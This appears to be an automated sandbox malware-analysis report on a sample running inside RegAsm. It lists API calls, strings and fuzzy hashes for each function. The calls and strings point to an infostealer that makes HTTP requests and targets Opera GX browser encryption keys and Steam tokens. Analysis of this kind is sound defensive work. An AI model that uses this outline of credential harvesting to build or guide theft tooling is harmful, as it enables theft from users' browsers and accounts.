APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 0041686B
ERROR, xrefs: 00416896

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C013060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C013095

Part of subcall function 6C0135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C09F688,00001000), ref: 6C0135D5
Part of subcall function 6C0135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0135E0
Part of subcall function 6C0135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0135FD
Part of subcall function 6C0135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C01363F
Part of subcall function 6C0135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C01369F
Part of subcall function 6C0135A0: __aulldiv.LIBCMT ref: 6C0136E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C01309F

Part of subcall function 6C035B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0356EE,?,00000001), ref: 6C035B85
Part of subcall function 6C035B50: EnterCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035B90
Part of subcall function 6C035B50: LeaveCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035BD8
Part of subcall function 6C035B50: GetTickCount64.KERNEL32 ref: 6C035BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0130BE

Part of subcall function 6C0130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C013127
Part of subcall function 6C0130F0: __aulldiv.LIBCMT ref: 6C013140

Part of subcall function 6C04AB2A: __onexit.LIBCMT ref: 6C04AB30

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 162687a8a1eb11c7c51f0ae8d21d992c5f6e74414e24666942731e90b8c38b52
Instruction ID: a54139cd48540bfa7d02e874c03ae42d7ff4454be0b852c516c856c6b6113fc2
Opcode Fuzzy Hash: 162687a8a1eb11c7c51f0ae8d21d992c5f6e74414e24666942731e90b8c38b52
Instruction Fuzzy Hash: 26F08612E2474496CA10DF7488413A6B3BCBF6B154B506729F85857561FF2071E883D5

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
Instruction ID: 27ee426b6b58d638c78c42283a2d386f26495828f80e9e64967a6f8c5e3c9e1b
Opcode Fuzzy Hash: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
Instruction Fuzzy Hash: 49513D71A00119ABCF01FFA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
